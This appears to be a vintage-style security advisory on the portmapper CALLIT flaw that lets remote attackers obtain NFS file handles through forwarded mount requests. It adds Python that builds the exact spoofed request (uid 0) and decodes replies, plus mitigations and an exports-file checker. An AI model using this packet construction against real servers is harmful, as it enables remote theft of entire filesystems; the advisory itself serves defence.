COMMAND
portmap
SYSTEMS AFFECTED
Older, unpatched portmapper/NFS implementations: specifically, systems
whose portmapper will forward requests to the mount daemon and which
export filesystems to themselves. Reported on SunOS 4.1.x, Ultrix,
Solaris and IRIX 4.x.
PROBLEM
Normally, to get at a file over NFS, a client must send the server
three things:
    an NFS file handle (something like a volume label, but for a file
        rather than a whole disk)
    the action it wants performed
    its user identity (the uid/gid in the AUTH_UNIX credentials,
        which the client itself asserts and the server believes)
If the client has never accessed that file before, it first sends a
mount request to the mount daemon. The mount daemon checks its export
list and, depending on what the client is allowed to do, hands back a
file handle. That handle can be reused to reach the file over and over
again; file handles normally stay valid indefinitely and can't be
revoked without recompiling or updating the server itself.
Instead of sending the mount request to the mount daemon directly, an
attacker can send it to the portmapper wrapped in a pmap_call, i.e. a
PMAPPROC_CALLIT request carrying a MOUNTPROC_MNT call. The portmapper
unwraps the inner call and forwards it to the mount daemon on the same
host. The mount daemon therefore sees a request originating from
localhost, checks it against the export list as such, and returns a
valid file handle. The portmapper relays the reply back, so the
attacker now holds a file handle and can use it against nfsd directly,
whenever he wants, to reach whatever files the localhost has
permission for.
An attacker could get access to your entire filesystem remotely.
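The exchange described above, as an added example that is not part of the original note: it encodes a MOUNTPROC_MNT call wrapped in PMAPPROC_CALLIT exactly as it would go to UDP port 111, decodes it the way the portmapper does before re-sending it from its own address, decodes the forwarded reply, and shows why an export list that names the server itself lets the request through. Program and procedure numbers are the standard Sun RPC ones (RFC 1057); the hostnames, addresses, reply bytes and export table are constructed, and nothing here touches the network.

```python
"""Portmapper CALLIT forwarding of a MOUNT request, encoded by hand in XDR."""
import struct

# Standard Sun RPC numbers (RFC 1057 / rpc(5)).
PMAP_PROG, PMAP_VERS, PMAPPROC_CALLIT = 100000, 2, 5
MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT = 100005, 1, 1
MSG_CALL, MSG_REPLY, RPC_VERSION = 0, 1, 2
MSG_ACCEPTED, ACCEPT_SUCCESS = 0, 0
AUTH_NULL, AUTH_UNIX = 0, 1
FHSIZE = 32  # NFSv2 file handle size

# --- XDR encoders -------------------------------------------------------
def xdr_u32(n):
    return struct.pack(">I", n)

def xdr_opaque(b):
    # variable-length opaque: length, bytes, zero padding to a 4-byte boundary
    return xdr_u32(len(b)) + b + b"\0" * ((4 - len(b) % 4) % 4)

def xdr_string(s):
    return xdr_opaque(s.encode())

def auth_null():
    return xdr_u32(AUTH_NULL) + xdr_opaque(b"")

def auth_unix(machine, uid, gid, gids=()):
    # AUTH_UNIX is asserted by the client; an attacker simply claims uid 0.
    body = (xdr_u32(0) + xdr_string(machine) + xdr_u32(uid) + xdr_u32(gid)
            + xdr_u32(len(gids)) + b"".join(xdr_u32(g) for g in gids))
    return xdr_u32(AUTH_UNIX) + xdr_opaque(body)

def rpc_call(xid, prog, vers, proc, cred, args):
    return (xdr_u32(xid) + xdr_u32(MSG_CALL) + xdr_u32(RPC_VERSION)
            + xdr_u32(prog) + xdr_u32(vers) + xdr_u32(proc)
            + cred + auth_null() + args)

def mnt_via_callit(xid, path, cred):
    """MOUNTPROC_MNT(path) wrapped in PMAPPROC_CALLIT, addressed to the portmapper."""
    inner = xdr_string(path)  # the mount daemon's own argument (dirpath)
    callit_args = (xdr_u32(MOUNT_PROG) + xdr_u32(MOUNT_VERS)
                   + xdr_u32(MOUNTPROC_MNT) + xdr_opaque(inner))
    return rpc_call(xid, PMAP_PROG, PMAP_VERS, PMAPPROC_CALLIT, cred, callit_args)

# --- XDR decoder --------------------------------------------------------
class Xdr:
    def __init__(self, data):
        self.d, self.p = data, 0

    def u32(self):
        (v,) = struct.unpack_from(">I", self.d, self.p)
        self.p += 4
        return v

    def opaque(self):
        n = self.u32()
        v = self.d[self.p:self.p + n]
        self.p += n + (4 - n % 4) % 4
        return v

    def fixed(self, n):
        v = self.d[self.p:self.p + n]
        self.p += n
        return v

    def auth(self):
        return self.u32(), self.opaque()

def parse_callit_request(pkt):
    """What the portmapper unpacks before re-sending the inner call from 127.0.0.1."""
    x = Xdr(pkt)
    xid, mtype, rpcv = x.u32(), x.u32(), x.u32()
    prog, vers, proc = x.u32(), x.u32(), x.u32()
    cred, _verf = x.auth(), x.auth()
    if (mtype, rpcv, prog, vers, proc) != (MSG_CALL, RPC_VERSION, PMAP_PROG,
                                           PMAP_VERS, PMAPPROC_CALLIT):
        raise ValueError("not a PMAPPROC_CALLIT call")
    tprog, tvers, tproc = x.u32(), x.u32(), x.u32()
    path = Xdr(x.opaque()).opaque().decode()
    return {"xid": xid, "cred_flavor": cred[0], "prog": tprog, "vers": tvers,
            "proc": tproc, "path": path}

def parse_callit_reply(pkt):
    """Decode the relayed reply: mountd's port plus an fhstatus carrying the handle."""
    x = Xdr(pkt)
    xid, mtype, rstat = x.u32(), x.u32(), x.u32()
    x.auth()  # reply verifier, ignored here
    astat = x.u32()
    if (mtype, rstat, astat) != (MSG_REPLY, MSG_ACCEPTED, ACCEPT_SUCCESS):
        raise ValueError("call not accepted")
    port = x.u32()
    res = Xdr(x.opaque())
    status = res.u32()
    fh = res.fixed(FHSIZE) if status == 0 else None
    return {"xid": xid, "mountd_port": port, "status": status, "fhandle": fh}

# --- export check as an old mountd does it, keyed on the request's source --
def export_allows(exports, source_addr, path):
    return source_addr in exports.get(path, ())

def attack_outcome(exports, attacker_addr, path):
    """(sent straight to mountd, sent via CALLIT): the second arrives from loopback."""
    return (export_allows(exports, attacker_addr, path),
            export_allows(exports, "127.0.0.1", path))

# Constructed data (not captured): a server exporting / to itself, and a reply
# in which mountd on port 1023 returned status 0 and a 32-byte handle.
EXPORTS = {"/": ("127.0.0.1",), "/export/home": ("10.0.0.5",)}
SAMPLE_FH = bytes(range(FHSIZE))
SAMPLE_REPLY = (xdr_u32(0xDEADBEEF) + xdr_u32(MSG_REPLY) + xdr_u32(MSG_ACCEPTED)
                + auth_null() + xdr_u32(ACCEPT_SUCCESS)
                + xdr_u32(1023) + xdr_opaque(xdr_u32(0) + SAMPLE_FH))

if __name__ == "__main__":
    pkt = mnt_via_callit(0xDEADBEEF, "/", auth_unix("evil", 0, 0))
    print(parse_callit_request(pkt))
    print(parse_callit_reply(SAMPLE_REPLY))
    print(attack_outcome(EXPORTS, "10.9.9.9", "/"))  # (False, True)
```

The source address is the only thing the export check has to go on, and CALLIT forwarding replaces it with the server's own loopback address; the AUTH_UNIX credentials survive the trip unchanged, so they do not help either.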
SOLUTION
Run a portmapper that will not forward requests to the mount daemon
(such as Wietse Venema's portmapper from the TCP Wrappers collection,
or his rpcbind replacement).
Enable port checking, so that nfsd rejects requests from unprivileged
source ports. Excerpted from Aleph1's /etc/rc.local file (SunOS 4.1.x;
adb patches the nfs_portmon kernel variable in the running kernel):
    rpc.mountd
    echo "nfs_portmon/W1" | adb -w /vmunix /dev/kmem
Block ports 111 (portmapper) and 2049 (NFS), TCP and UDP, from the
outside with a filtering router or proxy server.
On a Sun: add '-p' to the startup of mountd in /etc/rc*.
Do not self-reference an NFS server in its own exports file (no
"localhost" entry, and no entry naming the server's own hostname).
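A check for the last item, added here and not part of the original note: it scans a SunOS 4.1.x-style /etc/exports (assumed format: `/path -access=host:host,root=host,ro`) and reports every entry the server could mount from itself, either because the access or root list names localhost or the server's own name, or because the entry has no -access list at all and is therefore exported to everyone, the server included. The sample file contents and the hostname fileserv.example.com are constructed.

```python
"""Flag /etc/exports entries that let an NFS server mount its own exports."""

# Names under which a request forwarded by the local portmapper can appear.
SELF_NAMES = {"localhost", "127.0.0.1", "loopback"}

def parse_exports(text):
    """Yield (path, options) per non-comment line. options maps an option
    name to its host list (split on ':'), or to [] for flags such as 'ro'."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, opts = parts[0], {}
        for field in parts[1:]:
            if not field.startswith("-"):
                continue
            for opt in field[1:].split(","):
                name, _, value = opt.partition("=")
                opts[name] = value.split(":") if value else []
        yield path, opts

def self_referencing(text, hostname, aliases=()):
    """Return [(path, reason)] for entries the server itself could mount."""
    me = SELF_NAMES | {hostname.lower()} | {a.lower() for a in aliases}
    findings = []
    for path, opts in parse_exports(text):
        hosts = [h.lower() for h in opts.get("access", []) + opts.get("root", [])]
        hits = sorted(set(hosts) & me)
        if hits:
            findings.append((path, "grants access to this host: " + ",".join(hits)))
        elif "access" not in opts:
            findings.append((path, "no -access list: exported to everyone, this host included"))
    return findings

# Constructed sample, not a real exports file.
SAMPLE_EXPORTS = """\
# /etc/exports on fileserv.example.com
/usr/local   -access=nfsclient1:nfsclient2,ro
/home        -access=nfsclient1:localhost
/export/root -root=fileserv.example.com,access=fileserv.example.com
/var/spool   -access=nfsclient2
/tmp
"""

if __name__ == "__main__":
    for path, why in self_referencing(SAMPLE_EXPORTS, "fileserv.example.com"):
        print(f"{path}: {why}")
```

Run it against the real file with the output of hostname and any CNAMEs the server answers to as aliases; an empty result means no entry names the server or is open to the world.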